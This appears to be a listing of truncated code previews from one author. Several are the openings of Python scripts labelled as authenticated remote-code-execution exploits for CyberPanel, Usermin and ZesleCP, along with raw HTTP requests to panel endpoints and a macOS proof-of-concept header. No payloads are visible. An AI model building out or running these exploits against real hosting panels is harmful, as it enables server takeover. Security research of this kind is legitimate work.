numanturle

.data

/* Data segment: define our message string and calculate its length. */
msg:
    .ascii        "Hello, ARM64!\n"
len = . - msg

.text

/* Our application's entry point. */

numanturle

import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

numanturle

<?php
function anim($msg, $time)
{
    $msg = str_split($msg);
    foreach ($msg as $ms) {
        echo $ms;
        usleep($time);
    }
}
anim("

numanturle

/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/

#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

numanturle

HTTP REQUEST

POST /websites/addNewCron HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 137
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0

numanturle

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
# author: twitter.com/numanturle
# usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE]
# cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password


import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time
from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24


import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle

#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0


import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning

numanturle

POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 175
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0 
Content-Type: application/json;charset=UTF-8

numanturle

POST /add/ip/ HTTP/1.1
Host: 89.252.140.31:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://89.252.140.31:8083
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded